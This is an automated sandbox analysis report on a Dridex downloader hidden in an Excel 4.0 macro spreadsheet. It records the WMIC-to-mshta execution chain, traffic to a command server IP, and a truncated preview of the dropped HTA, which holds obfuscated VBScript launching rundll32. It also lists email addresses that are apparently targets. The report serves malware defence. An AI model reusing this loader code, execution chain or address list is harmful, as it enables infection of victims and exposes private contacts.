
Windows Analysis Report Offer-04563360.xlsb

Overview

General Information

Sample Name: Offer-04563360.xlsb
Analysis ID: 528030
MD5: 5b3a5c210da6c92ad1b28c057fb33808
SHA1: 922822e5c237a2c3006b2caea28936d5d9382943
SHA256: 69fe1bc03e4fc0a7c9ca0466cb3cc352c7446b27a4ddb466ba93aeae4fbac7df
Tags: Dridex, xlsx

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2652 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1532 cmdline: wmic process call create "mshta C:\ProgramData\rCVuy.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2596 cmdline: mshta C:\ProgramData\rCVuy.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: app.xml; Rule: JoeSecurity_XlsWithMacro4; Description: Yara detected Xls With Macro 4.0; Author: Joe Security

Dropped Files

Source: C:\ProgramData\rCVuy.rtf; Rule: JoeSecurity_DridexDownloader; Description: Yara detected Dridex Downloader; Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", ProcessId: 1532
Sigma detected: Suspicious WMI Execution
Source: Process started; Author: Michael Haag, Florian Roth, juju4, oscd.community; Data: Command: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\rCVuy.rtf", ProcessId: 1532

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Offer-04563360.xlsb; Virustotal: Detection: 8%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
Source: global traffic; HTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 132.148.135.183:8080; Connection: Keep-Alive
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 132.148.135.183:8080
Source: Joe Sandbox View; IP Address: 132.148.135.183 132.148.135.183
Source: unknown; TCP traffic detected without corresponding DNS query: 132.148.135.183 (reported 5 times)
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.463268191.0000000001B00000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CEB6FE.png
Source: global traffic; HTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1; Accept: */*; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 132.148.135.183:8080; Connection: Keep-Alive
Source: C:\Windows\System32\mshta.exe; Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Dridex Downloader
Source: Yara match; File source: C:\ProgramData\rCVuy.rtf, type: DROPPED

System Summary:

Found malicious Excel 4.0 Macro
Source: Offer-04563360.xlsb; Macro extractor: Sheet: Macro1 contains: mshta
Found Excel 4.0 Macro with suspicious formulas
Source: Offer-04563360.xlsb; Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: Offer-04563360.xlsb; Initial sample: Sheet name: Macro1
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000002.00000002.463155269.00000000001E0000.00000004.00000020.sdmp; Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\rCVuy.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default%<
Found obfuscated Excel 4.0 Macro
Source: Offer-04563360.xlsb; Macro extractor: Sheet: Macro1 high usage of CHAR() function: 51
Source: Offer-04563360.xlsb; Macro extractor: Sheet name: Macro1
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Offer-04563360.xlsb; Virustotal: Detection: 8%
Source: C:\Windows\System32\wbem\WMIC.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\rCVuy.rtf"
Source: unknown; Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\rCVuy.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\rCVuy.rtf"
Source: C:\Windows\System32\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$Offer-04563360.xlsb
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVREB48.tmp
Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSB@4/7@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Automated click: OK
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: Offer-04563360.xlsb; Initial sample: OLE zip file path = xl/media/image2.png
Source: Offer-04563360.xlsb; Initial sample: OLE zip file path = xl/media/image1.png
Source: Offer-04563360.xlsb; Initial sample: OLE zip file path = docProps/custom.xml
Source: 53F9.tmp.0.dr; Initial sample: OLE zip file path = xl/media/image1.png
Source: 53F9.tmp.0.dr; Initial sample: OLE zip file path = xl/media/image2.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: cmd line: rcvuy.rtf
Source: unknown; Process created: cmd line: rcvuy.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (reported 11 times)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe; Process information set: NOOPENFILEERRORBOX (reported 2 times)
Source: C:\Windows\System32\mshta.exe; Process information set: NOOPENFILEERRORBOX (reported 3 times)
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2932; Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2576; Thread sleep time: -60000s >= -30000s
Source: Yara match; File source: app.xml, type: SAMPLE
Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmp; Binary or memory string: !Progman
Source: mshta.exe, 00000005.00000002.676512820.0000000001130000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
Source: C:\Windows\System32\mshta.exe; Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation (reported 2 times)
Source: C:\Windows\System32\wbem\WMIC.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Techniques per tactic (the number in parentheses is the count attached to the technique in the report):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation (21); Scripting (4); Exploitation for Client Execution (32); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection (2); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (2); Scripting (4)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (15)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Email Collection (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Standard Port (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Offer-04563360.xlsb: 8% (Virustotal)
Offer-04563360.xlsb: 9% (ReversingLabs, label: Script-WScript.Malware.XBAgent)

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

URLs

http://www.%s.comPA: 0% (URL Reputation: safe)
http://www.icra.org/vocabulary/.: 0% (URL Reputation: safe)
http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG: 0% (Virustotal)
http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG: 0% (Avira URL Cloud: safe)
http://windowsmedia.com/redir/services.asp?WMPFriendly=true: 0% (URL Reputation: safe)
http://servername/isapibackend.dll: 0% (Avira URL Cloud: safe)

      Domains and IPs

      Contacted Domains

      No contacted domains info

Contacted URLs

http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG; Malicious: false; Antivirus detection: 0% (Virustotal), Avira URL Cloud: safe; Reputation: unknown

URLs from Memory and Binaries

http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check; Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://www.windows.com/pctv.; Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://investor.msn.com; Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://www.msnbc.com/news/ticker.txt; Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://www.%s.comPA; Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmp; Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: low
http://www.icra.org/vocabulary/.; Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.; Source: mshta.exe, 00000005.00000002.677290877.0000000003C50000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Source: mshta.exe, 00000005.00000002.677074313.0000000003A57000.00000002.00020000.sdmp; Malicious: false; Antivirus detection: URL Reputation: safe; Reputation: unknown
http://www.hotmail.com/oe; Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Malicious: false; Reputation: high
http://servername/isapibackend.dll; Source: WMIC.exe, 00000002.00000002.463268191.0000000001B00000.00000002.00020000.sdmp; Malicious: false; Antivirus detection: Avira URL Cloud: safe; Reputation: low
http://investor.msn.com/; Source: mshta.exe, 00000005.00000002.676893189.0000000003870000.00000002.00020000.sdmp; Malicious: false; Reputation: high

Contacted IPs

Public

IP: 132.148.135.183; Domain: unknown; Country: United States; ASN: 398101; ASN Name: GO-DADDY-COM-LLC (US); Malicious: false

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528030
Start date: 24.11.2021
Start time: 17:23:28
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 22s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Offer-04563360.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@4/7@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active AutoShape Object
• Active Picture Object
• Active Picture Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

17:24:44; API Interceptor; 13x Sleep call for process: WMIC.exe modified
17:24:45; API Interceptor; 444x Sleep call for process: mshta.exe modified

Joe Sandbox View / Context

IPs

Match: 132.148.135.183
• vote0882037.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• vote0882037.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• subscription-673890410.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• subscription-673890410.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• tax payment52023.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• tax payment52023.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• Offer 39052.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• payment_646921.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
• payment_646921.xlsb (malicious): 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                    Domains

                    No context

ASN

Match: GO-DADDY-COM-LLC (US)
• vote0882037.xlsb (malicious): 132.148.135.183
• vote0882037.xlsb (malicious): 132.148.135.183
• subscription-673890410.xlsb (malicious): 132.148.135.183
• subscription-673890410.xlsb (malicious): 132.148.135.183
• tax payment52023.xlsb (malicious): 132.148.135.183
• tax payment52023.xlsb (malicious): 132.148.135.183
• Offer 39052.xlsb (malicious): 132.148.135.183
• payment_646921.xlsb (malicious): 132.148.135.183
• payment_646921.xlsb (malicious): 132.148.135.183
• Arrival Notice, CIA Awb Inv Form.pdf.exe (malicious): 184.168.98.97
• Euro invoice.exe (malicious): 148.66.138.164
• New Order778880.exe (malicious): 173.201.188.238
• c0az1l4js3001lsk4xd9n.x86-20211124-0850 (malicious): 192.169.147.26
• Euro invoice.exe (malicious): 148.66.138.164
• 8pTiccdV2s.exe (malicious): 69.64.47.51
• DHL express 5809439160_pdf.exe (malicious): 184.168.96.165
• Payment transfer.exe (malicious): 148.66.138.249
• k6j1IMWw7Q.exe (malicious): 184.168.119.143
• 704.doc (malicious): 148.72.96.3
• nHSmNKw7PN.exe (malicious): 184.168.119.143

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

Created / dropped Files

C:\ProgramData\AgMsUNfeoaPT.txt
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 128
Entropy (8bit): 4.4073611589994215
Encrypted: false
SSDEEP: 3:YEh2NZjMAsqy9zfx99+XePQDRp4+BKbe8QKIqDKp2QKLlTpyKzn:YEhodMAgz57+3DfFBme81DKp2fL+s
MD5: 3DDF019B04083D7C7EEE4783BC82B32B
SHA1: 9933674A8EC41DDE3B407C8CFB19082376144F19
SHA-256: 6F72957748C8F23331545D8DDB5B3FA58152904E374B084CED3D296E7528DDB8
SHA-512: 8B5D4DF18EF7798B8431F799E1F616B98163D8A73D169F654F43578C57DAD4F0E9CF500B5B321F7EC45FC9ADEF552B49B93B5B588D25918846E70D17E0E9D5F7
Malicious: false
Reputation: low
                    Preview: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}
C:\ProgramData\rCVuy.rtf
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 4718
Entropy (8bit): 5.111825614248487
Encrypted: false
SSDEEP: 96:HlyRtKtTDYCiBJrGIq40dgeWMd9ndnhRu9sws3:wqTDYCi3GgM9dnhRuGwU
MD5: 4150C61F7F97DB2511DDE5EBCC99A3F4
SHA1: 5CB5D31E060CBE16A9BD8210BF99B85ED9A95FD3
SHA-256: 673D57F2510F5CFDCE86C4D7FF4BCFE9BCA337F1F6BD72CC4741446F862333D8
SHA-512: BA43A58145C426870944ACE40600F4E2A8EB24DD4CAAA3E84F72D897B06135A3D43F76680B344FD3B58124ED4573952F2B371A180699025890CB746E4F3EB610
Malicious: true
Yara Hits:
• Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\rCVuy.rtf, Author: Joe Security
Reputation: low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..O_c_R_a_D_s_p_y_q_F_z_A_w_c_y_G = "run" & Chr(100+1-1) & "" & "ll" & "32." & Chr(101+1-1) & Chr(120+1-1) & "" & "e " & "C:\" & Chr(92+1-1) & "Pro" & "gra" & Chr(109+1-1) & Chr(68+1-1) & "ata" & "\g" & Chr(118+1-1) & "ni" & "gg" & "er." & "bin" & Chr(32+1-1) & Chr(87+1-1) & "sp" & "Fre" & "eSt" & "ri" & "" & "" & "ng"..Set a_q_m_G_l_C_M_I_U_l_j_K_s_N_y_D_s = CreateObject("" & "MSX" & "ML" & "" & Chr(50+1-1) & ".Se" & "" & "rv" & Chr(101+1-1) & "rXM" & Chr(76+1-1) & "HTT" & "" & "" & "P." & Chr(54+1-1) & "" & ".0")....k_A_w_g_v_m_Q_G = "" & "Wsc" & "ri" & "pt" & ".S" & "hel" & "" & Chr(108+1-1) & ""..Set Y_Z_B_x_j_G_I_g_D_Q_N_Y_g_X_F_O = CreateObject(k_A_w_g_v_m_Q_G)..w_T_x_A_m_O_P_h_K_k = LCase(Y_Z_B_x_j_G_I_g_D_Q_N_Y_g_X_F_O.expandenvironme

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):128
                    Entropy (8bit):4.4073611589994215
                    Encrypted:false
                    SSDEEP:3:YEh2NZjMAsqy9zfx99+XePQDRp4+BKbe8QKIqDKp2QKLlTpyKzn:YEhodMAgz57+3DfFBme81DKp2fL+s
                    MD5:3DDF019B04083D7C7EEE4783BC82B32B
                    SHA1:9933674A8EC41DDE3B407C8CFB19082376144F19
                    SHA-256:6F72957748C8F23331545D8DDB5B3FA58152904E374B084CED3D296E7528DDB8
                    SHA-512:8B5D4DF18EF7798B8431F799E1F616B98163D8A73D169F654F43578C57DAD4F0E9CF500B5B321F7EC45FC9ADEF552B49B93B5B588D25918846E70D17E0E9D5F7
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A367EE7.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):37376
                    Entropy (8bit):7.968656906611756
                    Encrypted:false
                    SSDEEP:768:7PiRTH5k2UL/DIWy4Kwem6fZRnS3caTmDwhgorxK7bsdVcS4s:7PuALLImemeKHqeK7YncO
                    MD5:1016468D27038BE120F1F1460B89541B
                    SHA1:746395B724121D074EFBC262AB3B0C6A8449F081
                    SHA-256:DDEB10EDBCA4FB569F21DEF488C79B24002C37270D753501A2D35703BADA7DF4
                    SHA-512:0D2DB7EE55864B172F851529350D77B5FF81EAB85ED8C652DA823C6C9ABC3D82913BC52FF4BCEF36D1ECDD90A52A310A9BB8CD8201AD37EB6117E3841F63B980
                    Malicious:false
                    Reputation:moderate, very likely benign file
